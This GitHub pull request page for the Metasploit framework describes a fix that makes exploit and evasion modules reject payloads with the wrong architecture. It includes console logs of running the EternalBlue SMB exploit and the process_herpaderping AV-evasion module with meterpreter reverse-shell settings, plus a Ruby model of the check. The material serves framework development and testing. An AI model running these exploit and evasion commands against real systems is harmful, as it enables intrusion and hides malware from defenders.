Closed zeroSteiner closed 4 weeks ago
Working through the unit test failures right now.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.5.135.201 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2
008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass test no (Optional) The password for the specified username
SMBUser test no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008
R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Window
s 7, Windows Embedded Standard 7 target machines.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] 10.5.135.201:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.5.135.201:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.5.135.201:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.5.135.201:445 - The target is not vulnerable.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > use evasion/windows/process_herpaderping
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/process_herpaderping) > show options
Module options (evasion/windows/process_herpaderping):
Name Current Setting Required Description
---- --------------- -------- -----------
ENCODER no A specific encoder to use (automatically selected if not set)
FILENAME cWsCIIJEj.exe yes Filename for the evasive file (default: random)
REPLACED_WITH_FILE %SystemRoot%\System32\calc.exe no File to replace the target with. If not set, the target file will
be filled with random bytes (WARNING! it is likely to be caught by
AV).
WRITEABLE_DIR %TEMP% yes Where to write the loader on disk
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Evasion target:
Id Name
-- ----
0 Microsoft Windows (x64)
View the full module info with the info, or info -d command.
msf6 evasion(windows/process_herpaderping) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/process_herpaderping) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 evasion(windows/process_herpaderping) > run
[+] cWsCIIJEj.exe stored at /home/tmoose/.msf4/local/cWsCIIJEj.exe
msf6 evasion(windows/process_herpaderping) >
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.5.135.201 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2
008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass test no (Optional) The password for the specified username
SMBUser test no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008
R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Window
s 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[-] 10.5.135.201:445 - Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > use evasion/windows/process_herpaderping
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/process_herpaderping) > show options
Module options (evasion/windows/process_herpaderping):
Name Current Setting Required Description
---- --------------- -------- -----------
ENCODER no A specific encoder to use (automatically selected if not set)
FILENAME qRLJaTgIRR.exe yes Filename for the evasive file (default: random)
REPLACED_WITH_FILE %SystemRoot%\System32\calc.exe no File to replace the target with. If not set, the target file will
be filled with random bytes (WARNING! it is likely to be caught by
AV).
WRITEABLE_DIR %TEMP%\gvfrl.exe yes Where to write the loader on disk
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Evasion target:
Id Name
-- ----
0 Microsoft Windows (x64)
View the full module info with the info, or info -d command.
msf6 evasion(windows/process_herpaderping) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/process_herpaderping) > run
[-] evasion failed: windows/meterpreter/reverse_tcp is not a compatible payload.
msf6 evasion(windows/process_herpaderping) >
This PR fixes a bug where a user can specify an invalid payload architecture for a given exploit target. Previously, it was not possible to tab-complete an invalid payload, but this enforces the architecture limitations with a run-time exception before sending the exploit.
This updates the exploit and evasion module drivers to use #compatible_payloads to ensure that the selected payload is compatible with the module before running it. The previous check would only inspect the platform and not the architecture. This also means that only payloads that can be tab completed can be selected, making the behavior more consistent. Also, this means that as an exploit author now, when the target is defined to a particular platform and architecture combination, there's a guarantee that the payload instance matches what was defined. If there are instances where the user needed to select other values, then it's likely that the module's target definition is incorrect.
Verification
In both of these test cases, the payload module name must be fully specified and can not be tab completed.
- exploit/windows/rdp/cve_2019_0708_bluekeep_rce with a payload that matches the platform but is of an incorrect architecture (ARCH_X86 in this case). See that the module fails stating that the payload is incompatible.
- evasion/windows/process_herpaderping with a payload that matches the platform but is of an incorrect architecture for the target. See that the module fails, stating that the payload is incompatible.
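As an added example (not Metasploit's own driver code), a simplified Ruby model of the check this PR introduces and of the two verification cases above: the selected payload must match the target's platform and architecture, not just its platform. The Target/Payload structs, the payload catalogue's platform/arch attributes and run_module are assumptions made for this illustration.

```ruby
# Added illustration, not Metasploit's own code: a simplified model of the
# compatibility check the PR describes, where the driver compares the selected
# payload's platform *and* architecture against the chosen target before running.
# Module and payload names are taken from the page; the structs and functions
# below are assumptions built for this example only.

PayloadIncompatible = Class.new(StandardError)

Target  = Struct.new(:name, :platform, :arch)
Payload = Struct.new(:name, :platform, :arch)

# Constructed payload catalogue (names are real Metasploit payload names,
# platform/arch attributes are hypothetical test data).
PAYLOADS = [
  Payload.new('windows/meterpreter/reverse_tcp',     'windows', 'x86'),
  Payload.new('windows/x64/meterpreter/reverse_tcp', 'windows', 'x64'),
  Payload.new('linux/x64/meterpreter/reverse_tcp',   'linux',   'x64'),
].freeze

# Platform-only filter, i.e. the previous (insufficient) check.
def platform_compatible_payloads(target)
  PAYLOADS.select { |p| p.platform == target.platform }.map(&:name)
end

# Platform + architecture filter, the set that tab completion offers.
def compatible_payloads(target)
  PAYLOADS.select { |p| p.platform == target.platform && p.arch == target.arch }.map(&:name)
end

# Driver-side guard: refuse to run unless the selected payload is in the
# compatible set, mirroring the "is not a compatible payload" failure above.
def run_module(target, payload_name)
  unless compatible_payloads(target).include?(payload_name)
    raise PayloadIncompatible, "#{payload_name} is not a compatible payload."
  end
  "running #{target.name} with #{payload_name}"
end

if __FILE__ == $PROGRAM_NAME
  x64_windows = Target.new('Microsoft Windows (x64)', 'windows', 'x64')
  begin
    run_module(x64_windows, 'windows/meterpreter/reverse_tcp')
  rescue PayloadIncompatible => e
    puts "[-] evasion failed: #{e.message}"
  end
  puts run_module(x64_windows, 'windows/x64/meterpreter/reverse_tcp')
end
```

The platform-only filter still lists the x86 payload for the x64 target, which is exactly the gap the PR closes.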